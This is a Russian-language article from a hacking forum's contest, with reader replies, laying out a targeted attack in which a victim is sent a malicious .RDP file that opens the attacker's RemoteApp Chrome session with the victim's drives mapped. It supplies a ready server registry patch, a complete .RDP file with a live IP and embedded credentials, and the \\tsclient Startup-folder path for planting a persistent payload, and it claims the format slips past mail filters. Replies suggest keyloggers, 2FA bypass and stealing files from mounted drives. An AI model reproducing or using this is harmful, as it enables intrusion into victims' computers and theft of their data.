• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Злонамеренный дедик или RemoteApp

xrahitel

(L1) cache
Пользователь
Регистрация
29.04.2014
Сообщения
847
Реакции
1 368
В этой заметке мы рассмотрим немного техник социальной инженерии, которые можно использовать таргетированно, то есть в тех случаях, когда выбрана точная жертва (человек либо компания). Считается, что таргетированные атаки отнимают побольше времени на подготовку. Из опыта я знаю, что спровоцировать совершить что-то сотку случайных человек легче, чем одного определенного юзер-зверя в организации.

Ладно выше текст не мой, так заумно писать не умею и не хочу, сегодня будет не полностью боевой вариант, но будет, над чем подумать другим и развить данный способ до боевого так скажем в начале разберем атаку под названием browsing-download-attack смысл данной атаки что мы можешь подгрузить жертве файлик, через браузер, чатик и.т.д


Вообще фича интересная и небезопасная, выше два примера — атаки на веб-браузеры которые можно так эксплуатировать, смысл тут прост что данные браузеры, сохранять ранее открытые вкладки, давайте предположим ситуацию зашли на сайт и выключил комп, можно подменить страницу и.т.д

Позже вы поймете почему так издалека захожу, на сегодняшний день все форматы типо (com,exe, scr, jar, msi etc) или типо офисных (doc, docm, xls, xlsm, pub, ppt, pptm, pdf, rtf) в отличии от всех остальных типов файлов, офисные документы вызывают наименьшее кол-во подозрений. Скиньте жертве книгу, курс, мануал, техническое задание, райдер, прайс-лист, договор, расчетную ведомость, приказ, реферат, смету, акт выполненных работ, сценарий... В общем полное раздолье, вариантов можно много накидать, под любого человека, но писать про это уже скучно, если честно и не интересно.

Но сегодня мы рассмотрим способ доставки, через не обычный формат файла .RDP чтобы понять о чем пойдет речь, прочтите в начале внимательно эту статью Rogue RDP – Revisiting автор там много дал подсказок как говориться, но не сам способ реализации как всегда.

В общем там одни плюсы, почти, от обхода почтовых фильтров до Zone.Identifier (MOTW) и это действительно так, мною было проведено много тестов, почты на ура пропускаю такой формат, также почтовые клиенты типо Thunderbird ну как всегда, всеми же любимый школьникам телеграмм на один клик открывает файл .RDP


Итак, чтобы по порядку, вначале нам надо разобраться что за зверь такой .RDP что внутри основные параметры файлов RDP, сам файл Default.rdp находиться по умолчанию в папки "Мои Документы" профиль пользователя. Обычно, данный файл имеет атрибут "Скрытый" проще всего открыть, блокнотом и посмотреть, что храниться внутри
smile.png


Пример Default.rdp

Код:
screen mode id:i:2
use multimon:i:0
desktopwidth:i:1920
desktopheight:i:1080
session bpp:i:32
winposstr:s:0,1,442,192,1242,792

Не много подумав, пришел к выводу что в той статье шла речь, про RDPInception — атака через диски также тыц вектор давно известный, нужны подключенные диски и.т.д в качестве дополнения от меня как мотивировать жертву, подключить диски без подозрения, решение вот какое, запретить копировать файлы по rdp и наоборот разрешать.

Отключить в групповых политиках. Конфигурация компьютер

1.png

1.gpedit.msc
2.Административные шаблоны
3.Компоненты Windows
4.Службы удалённых рабочих столов
5. Узел сеансов удалённых рабочих столов
6. Перенаправление устройств и ресурсов
7.Включите опции "Не разрешать перенаправление буфера обмена" и "Не разрешать перенаправление дисков".


В чем тут прикол, если хочешь бесплатно заполучить приватный эксплойт
biggrin.png
Все, что для этого надо - купить дедик или взять бесплатный Amazon, т.к. это быстро, дешево/бесплатно, надежно. Понадобится буквально 10 минут для того, чтобы поднять собственный сервер и превратить его в honeypot, отлавливающий все попытки про эксплуатировать свежую уязвимость в RDP протоколе, жертва не сможет не чего копировать с вашего злонамеренного дедика, по этому чтобы скачать, например логи в один терабайт, придется привинчивать диски и.т.д не могло отошли от темы.


Продолжаем, по этому пошел не много другим способом, вспомним про RemoteApp, а что такое RemoteApp - технология терминального сервера, позволяющая публиковать приложение в терминальном режиме, но без необходимости заходить на удаленный рабочий стол сервера.

Проще говоря, пользователь запускает приложение, которое работает на стороне сервера, но внешне выглядит, будто оно запущено на локальном компьютере. Такой способ реализации заметно повышает удобство работы.

Данная технология появилась в Windows Server 2008. Ее можно установить в ролях и компонентах сервера. А настройка выполняется в оснастке «Диспетчер удаленных приложений RemoteApp», начиная с Windows Server 2012 — консоли управления сервером.

Типичный пример использования RemoteApp — публикация приложения 1С.


Выше видео это хорошо демонстрирует, по этому начал тесты, мои мысли были такие, чтобы открыть на стороне жертвы браузер и скинуть нашего зверька, тут сразу меня ожидал алерт что и в статье автора, то есть вход автоматом не получился у меня сделать, но про танцы сертом и установкой это отдельная статья нужна
wink.png


2.gif

Что бы накатить серт Вам поможет эта статья тыц там точно 7к знаков есть, Админу бы нашему зашло по любому, но не нам, покажу как такое сделать в пару кликов , скачивает софт SignKeyGen он создаст Вам два файла Sert.pfx и Sert.cer устанавливаем их по умолчанию на сервак и тачку.

3.gif


Потом скачиваем этот RemoteApp Tool в нем есть функция подписывать файлы .RDP (запомните этот софт)
smile.png


4.gif


Подпись файла .RDP выглядит так тыц.

5.gif

Действительно окно поменялось и выглядит не так опасно, хотя этот момент спорный с моей точки зрения, плюсом можно манипулировать названием издателя (administrator) может быть хоть Google.com, столько движений а толку что бы изменить окно, в бою от такого точно смысла не будет, так как серт надо ставить и на жертву и у себя, но так чтобы понять, как все работает, приходиться все это тестить всегда.

Хорошо, мои попытки, все таки найти решение на автоматическое подключение по клику на файле .RDP привели к мысли, что в файле надо прописать, как самого пользователя так и пароль от нашего дедика, тут тыц Вы найдете скрипт на питоне, который автоматом все делает и шифрует pass в нужную кодировку но, как и следовало ожидать, особого эффекта это не дало, но это нам пригодиться немного позже.


В начале было фиаско, один щелчок и пошло подключение но как всегда радость не была долгой, так как это работает если Вы у же залогинены раньше на данном дедике, то есть пригодиться кто занимается сетками и.т.д вектор тут может быть типо Mitm-атаки, (в пер. с англ. Мужчина-в-промежутке
biggrin.png
) когда уже есть доступ в локальную сеть, проще говоря мы знаем, что к этому дедику коннектиться жертва (RDPLinkEnum) и нам надо её протроянить, как то, есть почта, чат и.т.д


Будет так, как видео демонстрации.


В этом ещё лучше, так как нет алертов.



Все хорошо, но если мы зайдет в сохраненные учетки и удалим сохранённые данные, того фиаско у же не будет, как сделать в cmd набираем тупо netplwiz или control userpasswords2 более подробно тут тыц в общем работает в один клик, только при сохраненных учётках, как же быть, если жертва не разу не подключалась к вашему злонамеренному дедику, выход есть но жертве все ровне придется водить pass но это у же не так плоха.

Не буди сильно в даваться в сами способы доставки, но это элементарно выложит в халяве файл .RDP и к нему pass для подключения или попросить спецов помочь тыц настроить, даже если жертва его откроет в блокноте не чего там подозрительного нет, ну и.т.д сейчас посмотрю набил 7к знаков или нет и продолжим)


Браво у же 7300 букв Вам тут налил в уши, значит покатим накоротке оставшеюся часть, как сделать в два клика но второй не клик а просто ввод пароля, в общем тесты шли на моей тачке ведро 8.1 на северной 2012 R2 влияет это как то, мне не известно, но учтите это при тестах.

Патчим свою зверюгу файлом .reg
Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\TSAppAllowList\Applications]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\TSAppAllowList\Applications\Google Chrome]
"Name"="Google Chrome"
"Path"="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
"VPath"="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
"RequiredCommandLine"=""
"CommandLineSetting"=dword:00000001
"IconPath"="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
"IconIndex"=dword:00000000
"ShowInTSWA"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\TSAppAllowList\Applications\Google Chrome\Filetypes]
"xyz"="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe,0"
Данные изменения нам дадут возможность, запускать на компе жертвы, наш браузер хром (все по умолчанию)
Код:
allow desktop composition:i:1
allow font smoothing:i:1
alternate full address:s:94.103.94.202
alternate shell:s:rdpinit.exe
devicestoredirect:s:*
disableremoteappcapscheck:i:1
drivestoredirect:s:*
full address:s:94.103.94.202
prompt for credentials on client:i:1
promptcredentialonce:i:0
redirectcomports:i:0
redirectdrives:i:1
remoteapplicationmode:i:1
remoteapplicationname:s:Google Chrome
remoteapplicationprogram:s:||Google Chrome
span monitors:i:1
use multimon:i:1
username:s:administrator
password 51:b:01000000d08c9ddf0115d1118c7a00c04fc297eb

Выше содержание самого файла .RDP который мы отправим нашей жертве.

6.gif

В файле выше, вы можите указать не ip сервака а так, или свое название, так сказать для красоты или убедительности жертвы и.т.д ну думаю с этим вроде разобрались, жертва стартует файл и открывается наш удаленный браузер, что дальше, дальше нам надо прописать путь в удаленном браузере для скачивания файла на жертве, как это сделать.

Если вы внимательно читали статью автора а не глазами тут хлопали, то у же поняли
wink.png

Код:
Local Disk: \\tsclient\c\
USB Drive: \\tsclient\d\
Network File Share: \\tsclient\s\
В нашем случаи же будет прям так;
Код:
\\tsclient\C\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Да тут определённо есть минус, надо точно знать имя учетки, но если мы смотрим в контексте теста (administrator) стандарт как бы, если жертва скачивает файл он кладется не на серваке а ему в shell:startup вот тут мы и вернемся в самое начало статьи про атаку под названием browsing-download-attack что бы не жертва что то скачивала, а мы сами все настроим на своем же браузере и.т.д видео чисто для демонстрации, как это работает все.



Видео пришлось обрезать не много
wink.png



Если честно ребят, нет времени у меня все это проверить, нормально, в данном видео мы видим, что нет не каких алертов от безопасности и.т.д много чего ещё тут не указал, но пусть это будет типо школо антинуб) но дам подсказу в теме есть софт, который все делает в пару кликов, Вам надо только подправить сам файл .RDP поиграться с настройками, лучшие конечно было бы стартовать офис, так как дизайн у всех пользователей один почти в 99% процентах, это работает но не нашел пока как сохранить зверька на жертве и.т.д

Также как вектор атаки, можно использовать это, прочтите внимательно статью bypass-2fa-using-novnc вот видео демонстрация от меня тыц подтягиваем свой софт, браузер что бы жертва авторизовалось в нем, размах тут есть , как выше уже говорил.


На этом ограничусь, пожелав Всем участникам победы, фарту и крепкого Сибирского здоровья, также спонсору и Админу
7.gif


p.s Хайд в течение недели снимается
wink.png
 

Вложения

  • 4.gif
    4.gif
    18.4 КБ · Просмотры: 307
  • 5.gif
    5.gif
    25.3 КБ · Просмотры: 309
Пожалуйста, обратите внимание, что пользователь заблокирован
"Я написал статью на конкурс, только я ее вам не отдам" (с) почтальон Хранитель...
pochtalon-pechkin_217342887_orig_.jpg
 
Рябят да нормально все там, есть просто проблемы у меня в реалии, выложил заранее так скажем, на всякий случай, если не смогу сам то Админушка откроет через неделю
wink.png


Видео есть одно в открытом виде про тему, там просто как собрать такое.

 
RDP ярлык с расшариванием диска.
Local Resources, More, Drives, Local disk D:\

drivestoredirect:s: D:\;
Мысли правильные, только не каких ярлыков и подключенных дисков, ты говоришь про RDPInception
wink.png

Мб роботяги из форума уже догадались что за реализация и админа ждать не будем а?)
Да сама атака тут Rogue RDP )
клянусь, там шота про венду ! ))
Ну как всегда)
 
photo_2022-03-30_21-56-37.jpg


xrahitel ждемц. Будет интересно ознакомиться (судя по видео). Удачно порешать проблемы в реале.
 
Голосую за эту статью. Там в принципе все что угодно можно цеплять. Локальный кейлогер, вредоносный js, даже сбор всех полей с отвязкой 2FA. Придумать вариантов можно массу.
 
Чего нет указал в статье и так мои мысли были догнать тему, не обязательно кого троянить, про патчили дедик запускаем скрипт на своем дедике, этот например тыц который проверяет наличие USB-накопителей каждые 60 секунд как жертва смонтировала диски или устройства, пиздим все что надо
wink.png
 
Нужно признать, что довольно нестандартный и интересный метод :) Причем наводит на очень хорошие мысли, в какую сторону это все можно развить. Статьи, которые наводят на какие-то мысли, всегда самые лучшие! Ну и я давний поклонник любых СИ-методов.

P. S. Пока лимит на лойсы, как снимется - мой голос за тебя.
 
While the technique may not be the most difficult or revolutionary thing to ever get published, I really appreciate the logic and approach demonstrated here by TS. It has been said- "Discovery is about seeing what everybody has seen, but thinking what no one else thought". Cheers, OP. Thank you for your time and contributions on the forum. May the best man win =)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх